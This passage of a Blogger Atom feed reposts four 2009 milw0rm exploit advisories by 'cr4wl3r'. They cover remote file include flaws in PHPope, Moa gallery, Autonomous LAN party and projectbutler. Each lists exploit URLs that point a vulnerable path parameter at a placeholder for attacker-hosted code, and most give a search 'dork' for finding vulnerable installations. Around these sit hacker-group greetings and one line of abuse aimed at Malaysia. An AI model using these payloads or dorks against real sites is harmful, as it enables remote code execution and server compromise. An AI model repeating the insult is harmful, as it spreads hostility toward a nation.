src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-557254803637856177</id><published>2009-09-16T10:34:00.001-07:00</published><updated>2009-09-16T10:34:26.376-07:00</updated><title type='text'>PHPope &lt;= 1.0.0 Multiple Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;######################################################################&lt;br /&gt;#[x] PHPope &lt;= 1.0.0 Multiple Remote File Include Vulnerability                      &lt;br /&gt;#[!] Download Script      :  http://sourceforge.net/projects/phpope/files/                         &lt;br /&gt;#[!] Author               :  cr4wl3r                                      &lt;br /&gt;#[!] Contact              :  cr4wl3r[4t]linuxmail[dot]org                 &lt;br /&gt;#[!] Location             :  Gorontalo - INDONESIA                        &lt;br /&gt;#[!] Dork                 :  "FuCk y0u MaLaYsia"      &lt;br /&gt;######################################################################&lt;br /&gt;&lt;br /&gt;[x] 3xplo!t :                                                            &lt;br /&gt;                                                                                &lt;br /&gt;http://localhost/[path]/plugins/address/admin/index.php?GLOBALS[config][dir][plugins]=[AvriLhea]    &lt;br /&gt;http://localhost/[path]/plugins/im/compose.php?GLOBALS[config][dir][functions]=[AvriLhea]&lt;br /&gt;http://localhost/[path]/plugins/cssedit/admin/index.php?GLOBALS[config][dir][classes]=[AvriLhea]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;and many others&lt;br /&gt;&lt;br /&gt;######################################################################&lt;br /&gt;#[!] Greetz : MyMom [alm] &lt;br /&gt;#                                                                       &lt;br /&gt;#[!] Special Thanks : str0ke, google, sourceforge, All MusLiM HacKers &lt;br /&gt;#&lt;br /&gt;#[!] Thanks 2 : xoron, opt!x hacker, irvian, cyberlog&lt;br /&gt;#&lt;br /&gt;#[!] AlfaNet Cr3w GoRonTaLo : FaHry PunKs, RhyA HaMim, BoBy C00l, UyaN, ArYa.TaMa&lt;br /&gt;#&lt;br /&gt;#[!] My BiG BozZ MinJo.B0rj0e (YanG PunYa SepaRuH KaMpuNg Bugis, JaNgan LuPa Am-Am) :D&lt;br /&gt;#&lt;br /&gt;#[!] FuCk MaLaYsia, I HaTe MaLaYsia, h0w Ab0uT y0u???&lt;br /&gt;#&lt;br /&gt;#[!] sekuritionline.net | manadocoding.net                                         &lt;br /&gt;######################################################################&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-09-03]&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-557254803637856177?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/557254803637856177/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/phpope-100-multiple-remote-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/557254803637856177'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/557254803637856177'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/phpope-100-multiple-remote-file-include.html' title='PHPope &lt;= 1.0.0 Multiple Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-4582017573897605968</id><published>2009-09-16T10:33:00.001-07:00</published><updated>2009-09-16T10:33:49.174-07:00</updated><title type='text'>Moa gallery &lt;= 1.2.0 Multiple Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$&lt;br /&gt;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&lt;br /&gt;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&lt;br /&gt;||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||&lt;br /&gt;######################################################################&lt;br /&gt;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&lt;br /&gt;**********************************************************************&lt;br /&gt;######################################################################&lt;br /&gt;#[x] Moa gallery &lt;= 1.2.0 Multiple Remote File Include Vulnerability                      &lt;br /&gt;#[!] Download             :  http://sourceforge.net/projects/moagallery/files/                         &lt;br /&gt;#[!] Author               :  cr4wl3r                                      &lt;br /&gt;#[!] Contact              :  cr4wl3r[4t]linuxmail[dot]org                 &lt;br /&gt;#[!] Location             :  Gorontalo - INDONESIA                        &lt;br /&gt;#[!] Dork                 :  "Tanyakan Pada Rumput Yang Bergoyang"        &lt;br /&gt;######################################################################&lt;br /&gt;&lt;br /&gt;[x] 3xplo!t :                                                            &lt;br /&gt;                                                                                &lt;br /&gt;http://localhost/[path]/sources/_error_funcs.php?MOA_PATH=[AvriLhea]&lt;br /&gt;http://localhost/[path]/sources/_integrity_funcs.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/_template_component_admin.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/_template_component_gallery.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/_template_parser.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/mod_gallery_funcs.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/mod_image_funcs.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/mod_tag_funcs.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/mod_tag_view.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/mod_upgrade_funcs.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/mod_user_funcs.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/page_admin.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/page_gallery_add.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/page_gallery_view.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/page_image_add.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/page_image_view_full.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/page_login.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;http://localhost/[path]/sources/page_sitemap.php?MOA_PATH=[AvriLhea]         &lt;br /&gt;&lt;br /&gt;######################################################################&lt;br /&gt;#[!] Greetz : MyMom [alm] &lt;br /&gt;#                                                                       &lt;br /&gt;#[!] Special Thanks : str0ke, google, All MusLiM HacKers &lt;br /&gt;#&lt;br /&gt;#[!] Thanks 2 : Irvian, xoron&lt;br /&gt;#&lt;br /&gt;#[!] SeLamaT MenuNaiKan IbaDah PuaSa RaMadHan 1430H                                             &lt;br /&gt;######################################################################&lt;br /&gt;**********************************************************************&lt;br /&gt;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&lt;br /&gt;######################################################################&lt;br /&gt;||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||&lt;br /&gt;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&amp;amp;&lt;br /&gt;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&lt;br /&gt;$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-08-26]&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4582017573897605968?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/4582017573897605968/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/moa-gallery-120-multiple-remote-file.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4582017573897605968'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4582017573897605968'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/moa-gallery-120-multiple-remote-file.html' title='Moa gallery &lt;= 1.2.0 Multiple Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-5666717103330025008</id><published>2009-09-16T10:32:00.000-07:00</published><updated>2009-09-16T10:33:13.936-07:00</updated><title type='text'>Autonomous LAN party &lt;= 0.98.3 Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;============================================================================================================&lt;br /&gt;[x] Autonomous LAN party &lt;= 0.98.3 Remote File Include Vulnerability                                      ||&lt;br /&gt;[!] Download Script      :                                                                                ||&lt;br /&gt;http://sourceforge.net/projects/alp/files/alp/alp_0-98-3_15oct2006/alp_0-98-3_15oct2006.zip/download   ||&lt;br /&gt;[!] Author               :  cr4wl3r                                                               ||&lt;br /&gt;[!] Contact              :  cr4wl3r[4t]linuxmail[dot]org                                          ||&lt;br /&gt;[!] SiTe                 :  |www.sekuritionline.net| |www.manadocoding.net|                  ||&lt;br /&gt;[!] Location             :  Gorontalo - INDONESIA                                                 ||&lt;br /&gt;[!] Dork                 :  "Tanyakan Pada Rumput Yang Bergoyang"                                 ||&lt;br /&gt;============================================================================================================&lt;br /&gt;============================================================================================================&lt;br /&gt;[x] 3xplo!t :                                                                                     ||&lt;br /&gt;                                                                                                 ||&lt;br /&gt;http://localhost/[path]/include/_bot.php?master[currentskin]=[AvriLhea]                                   ||&lt;br /&gt;                                                                                                         ||&lt;br /&gt;============================================================================================================&lt;br /&gt;============================================================================================================&lt;br /&gt;[!] Greetz : MyMom [alm]                                                                                  ||&lt;br /&gt;                                                                                           ||&lt;br /&gt;[!] Special Thanks : str0ke, All MusLiM HacKers                                                           ||&lt;br /&gt;                                                                                                 ||&lt;br /&gt;[!] Shoutz : Mr_Athan, CyberPeaCe, AgenR@t, AngKy.Tat0ki, basix, EA.ngel, zvtral,                         ||&lt;br /&gt;            bl4ck.3n91n3, d3vilnet, venom.injector,Funky.Sensey, untouch,                                ||&lt;br /&gt;            exnome, Himoe, kec0a, Mr.C, Mr.crosbeam, Ri55ky, v3lix, Hmei7,                               ||&lt;br /&gt;            CyberLog, g4pt3k, mywisdom, wendys, y0ps.512mb, Is.bl4nk, iY0ng,                             ||&lt;br /&gt;            Anjas.chu'x, Jams.chu'X, Minj0.b0rj0e, exnome, dbanie, Ijan,                                 ||&lt;br /&gt;            SunKetzu AbbaSSia, ty0                                                                       ||   &lt;br /&gt;                                                 ||&lt;br /&gt;============================================================================================================                                                 ||&lt;br /&gt;[!] Thanks To MneR HacKer UniVerSiTas IcHsaN GoRonTaLo :                                                  ||&lt;br /&gt;                                                                                                         ||&lt;br /&gt;   Adi Saputera Abd Karim S.Kom, Sudirman Melangi S.Kom, Abd Manan ST, All StAF FaK FiKoM UniSaN         ||&lt;br /&gt;   Dan SeLuRuh WisuDawan Universitas Ichsan Gorontalo Angkatan 2009                                      ||&lt;br /&gt;   FroM : cr4wl3r a.k.a Ramdan Yantu S.Kom :lol:                                                         ||&lt;br /&gt;                                                                                                         ||&lt;br /&gt;============================================================================================================&lt;br /&gt;[!]  To My HoNeY Lia Aprilia Hasan ---&gt; BiarPun KaMu Lagi MaraH Tetap SaJa Kelihatan CanTik  ;)             ||&lt;br /&gt;                                                                                                         ||&lt;br /&gt;============================================================================================================&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-08-18]&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-5666717103330025008?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/5666717103330025008/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/autonomous-lan-party-0983-remote-file.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/5666717103330025008'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/5666717103330025008'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/autonomous-lan-party-0983-remote-file.html' title='Autonomous LAN party &lt;= 0.98.3 Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-299053452797927460</id><published>2009-09-16T10:31:00.000-07:00</published><updated>2009-09-16T10:32:32.352-07:00</updated><title type='text'>projectbutler &lt;= 1.5.0 (offset) RFI Vulnerability</title><content type='html'>&lt;pre&gt;#projectbutler - 1.5.0 (offset) RFI Vulnerability&lt;br /&gt;&lt;br /&gt;#Author: cr4wl3r&lt;br /&gt;&lt;br /&gt;#Contact: cr4wl3r[4t]linuxmail[dot]org&lt;br /&gt;&lt;br /&gt;#Download: http://sourceforge.net/projects/projectbutler/files/projectbutler/1.5.0/ProjectButler.tar.gz&lt;br /&gt;&lt;br /&gt;#Vuln : require_once($offset."class.project.inc");&lt;br /&gt;&lt;br /&gt;#PoC :&lt;br /&gt;&lt;br /&gt;http://localhost/[path]/pda/pda_projects.php?offset=[AvriLhea]&lt;br /&gt;&lt;br /&gt;#Greetz : MyMom [alm]&lt;br /&gt;&lt;br /&gt;#Special To : |CyberSufi| |CyberPeaCe| |AgenR@t| |Ea.ngel| |bl4ck.3n91n3| |Hmei7| |Dew0| |Anjas.chu'X| |Ridwan|             &lt;br /&gt;&lt;br /&gt;             |Funky_sensey| |zvtral| |Is.bl4nk| |Y0ps.512mb| |Clif| |HaKu Frisca| |All cRew GoRonTaLo UnDeRgounD|&lt;br /&gt;             |SunKetzu AbbaSSia| |iY0ng| |MaTr0| |deviln3t| |RyO| RaIs R0yaS| |Vel!x| |AnaK2 BolMonG| |MarLoN|&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-08-03]&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-299053452797927460?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/299053452797927460/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/projectbutler-150-offset-rfi.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/299053452797927460'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/299053452797927460'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/projectbutler-150-offset-rfi.html' title='projectbutler &lt;= 1.5.0 (offset) RFI Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
